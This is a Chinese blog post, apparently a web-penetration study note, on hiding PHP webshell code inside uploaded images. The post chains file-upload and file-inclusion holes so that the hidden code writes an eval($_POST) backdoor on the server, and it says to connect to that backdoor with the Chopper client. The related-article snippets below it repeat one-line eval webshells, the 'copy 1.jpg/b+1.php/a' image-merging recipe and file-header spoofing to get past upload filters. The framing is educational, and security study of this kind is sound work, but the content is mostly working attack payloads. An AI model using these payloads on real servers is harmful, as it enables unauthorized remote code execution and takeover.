图片木马---web渗透学习

最新推荐文章于 2024-12-17 14:31:16 发布
原创 最新推荐文章于 2024-12-17 14:31:16 发布 · 1.4k 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#图片木马 #文件上传漏洞 #文件包含漏洞 #web渗透学习

本文介绍了如何结合文件包含漏洞与文件上传漏洞,穿透高安全级别的限制。通过在图片中嵌入PHP代码,然后利用文件包含访问,生成可执行的shell文件,从而获取服务器权限。同时讨论了数据包抓包分析以及可能的WAF规避策略,并提出了安全防护建议,如动态检查文件内容以防止恶意代码执行。

在《文件上传漏洞—Web渗透学习》一文中讲到在高安全级别(有较强安全意识的开发人员)中,开放人员定义了用户上传文件的扩展名,只有文件扩展名是jpg、JPG、jpeg、JPEG等文件才允许上传。通过代理服务器等方法无法对其进行渗透。
通过文件包含漏洞的渗透方法和文件上传漏洞的方法结合,可以成功渗透文件上传漏洞中的高安全级别。
原理:
我们在高安全级别中真实的长传一张图片,但在通过图片编辑软件,将php语句添加到该图片中。
php语句如下:

<?fputs(fopen("shell50.php","w"),'<?php eval($_POST[1]);?>')?>

然后通过文件包含来访问该图片,使该语句得到执行,从而生成shell50.php文件,文件内容为:

<?php eval($_POST['1']);?>

上传图片:
在这里插入图片描述通过文件包含访问该图片(显示乱码表示图片上传成功):
在这里插入图片描述访问的实质是通过include函数对执行上传的图片进行执行,从而生成shell50.php文件。

接下来用菜刀访问该shell50.php文件,从而获取该服务的文件操作权限。

后记:
在该实验中进行了抓包,图片上传过程的数据包信息如下:

最低0.47元/天 解锁文章
web渗透--61--web服务器解析漏洞
武天旭的博客
09-23 1690
1、漏洞描述: 服务器相关中间件存在一些解析漏洞,攻击者可通过上传一定格式的文件,被服务器的中间件进行了解析,这样就对系统造成一定危害。常见的服务器解析漏洞涉及的中间件有IIS,apache、nginx等。 2、检测方法 以下为常见的各大web服务器所出现过的解析漏洞汇总,在检测时刻参考:
php 图片木马,php图片木马实现原理
weixin_27310417的博客
03-09 4830
什么是木马木马病毒是指隐藏在正常程序中的一段具有特殊功能的恶意代码,是具备破坏和删除文件、发送密码、记录键盘和攻击Dos等特殊功能的后门程序。那,php的木马是长什么样的呢?我们来看下面这段代码:...
图片木马
weixin_54252904的博客
04-17 480
借鉴别人许多 图片木马的合并 copy 1.jpg/b+2.php/a 生成的.jpg 也可以在图片版权中添加Php脚本语言 文件幻术 文件幻术 png 89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52 jpg FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 01 2c gif 47 49 46 38 39 61 F1 00 2C 01 F7 00 00 64 32 33 后缀名绕过 .php .php2 .php3
图片木马-渗透测试
h0ers的博客
10-28 3119
制作图片木马中的问题 问题 :copy命令制作图片木马后,菜刀无法连接 1.执行步骤: 一张普通图片:1.jpg php版本一句话木马,保存为 1.php,代码如下: <?php @eval($_POST['pass']);?> 制作图片木马,将图片文件和php文件合并为2.jpg,命令如下: copy 1.jpg/b+1.php/a 2.jpg 其中 /b代表二进制文件,/a代表ASCII码文件 上传成功后,用菜刀连接,弹出成功获取图片,未拿到webshell。 2.问题排查 用HxD h
轻院课程-VulnHub-AI-web-1.0靶机渗透
问芙的博客
09-05 1766
难度:中级网络:DHCP网络模式:NAT该框旨在测试渗透测试人员的技能。目标很简单。从 /root/flag.txt 获取标志。枚举框,获取低特权 shell,然后将权限升级到 root目标:获取 root 特权、拿到flag。
Web渗透-网络安全面试 面试宝典 2023最新版65页超全解析.pdf
10-16
这份"Web渗透-网络安全面试 面试宝典 2023最新版65页超全解析.pdf"文档详细涵盖了多个关键知识点,为求职者准备网络安全面试提供了全面的学习材料。 1. **MSF(Metasploit Framework)与Burp Suite**:这两个是渗透...
冰河的渗透实战笔记-冰河.pdf
05-18
冰河整理的全网首个开源的以实战案例为背景的渗透实战笔记,全书共442页,共计37万字(不...整本书的内容涵盖:Kali基础、渗透工具、木马制作、钓鱼链接生成、爆破密码、内存溢出攻击、web渗透、数据提权、社会工程学。
制作简单图片木马
Ro_kin的博客
07-20 1万+
下面来制作一个简单的图片木马 我就把电脑桌面的一个图片作为例子吧 下面是原始图片: test.png 接下来写一句话木马 新建一个muma.php文件,写入一句话木马<?php eval($_POST['hh']); ?>然后在win+R,cmd,cd到原始图片的目录路径下 我的就是桌面了,输入copy test.png/b+muma.php/a muma.png如图: 桌面
PHP检测本地图片是否有木马
04-20
也可以用linux服务器上的木马扫描软件,比如 Clamav 支持命令行执行的,上传之后就扫一下,最可靠, $last_line = system('php /var/bin/clamdscan upload.jpg'); 根据扫描结果就可以判断了 $rs = checkMuma("sucaihuo.png"); $tips = array( "0" => "文件没问题", "5" => "文件有毒", "-1" => "文件没有上传" );
一句话图片木马
qq_44111753的博客
08-20 1万+
一句话图片木马 一、准备图片木马 1、准备任意图片pho.jpg 2、准备木马文件hack.php <?php @eval($_POST['hack']);?> 3、利用系统命令,将木马复制到图片文件中,产生图片木马hack.jpg copy pho.jpg/b+hack.php/a hack.jpg b二进制格式,a为ASCII 二、上传图片 三、利用文件包含漏洞解析图片木马(没有文件包含漏洞图片木马将无法执行) 1、 右键图片复制图片地址,找到图片木马具体位置(upload//4820
木马制作——图片木马制作
weixin_50339082的博客
06-09 1万+
木马制作——图片木马制作 一、简单说明 图片木马指的是图片格式的文件木马图片格式包括jpg,png等,原理是将木马程序和图片捆绑在一起,达到伪装的目的,程序可以是脚本语言或者编译语言,在web渗透中,通常将脚本编写的webshell和图片合成一个新的木马,结合web文件上传漏洞进行利用,获取网站应用的webshell权限。 二、制作方式 利用windows 命令 准备一个木马,以php一句话为例,文件名为pass.php,内容如下: <?php @eval($_POST['pass']); ?
图片木马的制作
qq_46277212的博客
06-27 946
1.一张图片,jpg格式 1.jpg 2.一句话木马 2.asp <?php eval requset ("value");?> 3.cmd: copy 1.jpg/b+1.asp/a 2.jpg 使用Notepad++打开可发现,在jpg文件底部有着木马代码
文件上传图片
2301_80661529的博客
03-04 3056
图片马:就是在正常图片中插入木马
2017-11-03-PHP图片木马
PFinal社区
11-03 892
layout title date author desc in_head post PHP图片木马 2017-11-03 09:03:02 +0800 Q九 本测试主要针对的是 IIS 7.0/IIS 7.5/ Nginx <8.03畸形解析漏洞 基于Windows系统的 <style> .a...
做一个图片马(图片木马)的四种方法 小白也能看会(详细步骤 ) 需要.htaccess等执行图片代码
热门推荐
qq_48368964的博客
07-28 2万+
图片马:就是在图片中隐藏一句话木马。利用.htaccess等。
做一个图片马(图片木马)的四种方法 小白也能看会(详细步骤 ) 需要.htaccess等执行图片代码_图片马制作
最新发布
韩束一叶子
12-17 3001
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
图片木马制作方法详细教程
爱吃仡坨的Blog
10-24 1万+
将写的木马插入到图片中,之后配合解析漏洞.htaccess等,对图片马进行解析,从而执行图片中的恶意代码;# 因此 服务器是对文件后缀来对文件进行解析的,所以我们可以通过修改文件后缀来对图片进行访问。此时生成的是图片文件,我们将后缀改为zip时,任然可以读取压缩包文件中的内容。先将一张图片放到PS中,之后点击左上角文件——>文件简介。通过十六进制编辑器,将一句话木马写入图片中。通过图片隐藏信息,是一个合成的过程。最后将带有一句话木马图片导出。图片越小的文件,制作工艺越纯良。把压缩包放到图片中,进行合成。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值